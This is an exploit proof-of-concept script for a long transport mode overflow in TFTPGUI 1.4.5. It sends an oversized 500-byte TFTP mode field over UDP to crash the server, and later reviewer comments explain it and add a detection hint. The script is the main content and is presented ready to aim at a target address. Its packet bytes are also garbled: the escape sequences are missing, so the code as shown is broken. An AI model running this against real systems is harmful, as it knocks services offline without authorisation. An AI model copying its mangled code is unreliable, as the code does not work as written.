
# Title : TFTPGUI Long Transport Mode Overflow
# Published : 2010-05-02
# Author : Jeremiah Talamantes


# Exploit Title: TFTPGUI Long Transport Mode Overflow
# Date: 5/1/2010
# Author: Jeremiah Talamantes
# Software Link: http://sourceforge.net/projects/tftputil/files/TFTPUtil/TFTPUtil%20Version%201.4.5/TFTPUtil_GUI_Version_1.4.5_Binary_Installer.exe/download
# Version: 1.4.5
# Tested on: Windows XP, SP2 (En)
# CVE : N/A

#!/usr/bin/python
# Python 2 script (print statements, str payloads); it does not parse under Python 3.
# Proof-of-concept: sends one UDP datagram carrying an oversized "transport mode"
# field to a TFTPGUI 1.4.5 server and leaves it to the operator to observe whether
# the service is still running -- nothing is read back from the target.
# NOTE(review): the stray "n" at the start of the first banner line and the end of
# the last one is presumably a "\n" escape whose backslash was lost when the page
# was extracted; as written, the literal letter is printed.
print "n#################################################################"
print "##                      RedTeam Security                       ##"
print "##             TFTPGUI Long Transport Mode Overflow            ##"
print "##                        Version 1.4.5                        ##"
print "##                      LIST Vulnerability                     ##"
print "##                                                             ##"
print "##                     Jeremiah Talamantes                     ##"
print "##                   labs@redteamsecure.com                    ##"
print "################################################################# n"

import socket
import sys

# Change these values to suit your needs
# Target address and the TFTP well-known port (UDP/69).
host = '192.168.1.108'
port = 69
 
# Create a UDP (SOCK_DGRAM) socket. UDP is connectionless, so nothing is
# "connected" at this point; the error message below is misleading -- this branch
# only fires if socket creation itself fails. The bare `except:` also swallows
# SystemExit and KeyboardInterrupt; `except socket.error:` would be the narrow form.
try:
   s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
   print "Error: unable to connect."
   sys.exit(1)
 
# Creating the overly long transport mode string 
# fn is a one-character filename; md is a 500-byte mode field, far longer than
# the few bytes a legitimate TFTP mode name occupies.
fn = "A"
md = "A" * 500
# NOTE(review): "x00x02" contains no backslashes as shown, and the two "" are empty
# strings, so as written the datagram starts with the ASCII text x00x02 followed by
# fn and md simply concatenated. The original escape sequences were presumably lost
# in page extraction; they are deliberately not reconstructed here.
stuff = "x00x02" + fn + "" + md + ""

# Send data
# Single fire-and-forget datagram; no reply is awaited and the socket is never
# closed (the process exits right after). Detection note: this is one ~500+ byte
# request datagram to UDP/69, an anomalous size for a TFTP read/write request.
s.sendto(stuff, (host, port))
print "Check to see if TFTPGUI is still running..."

# End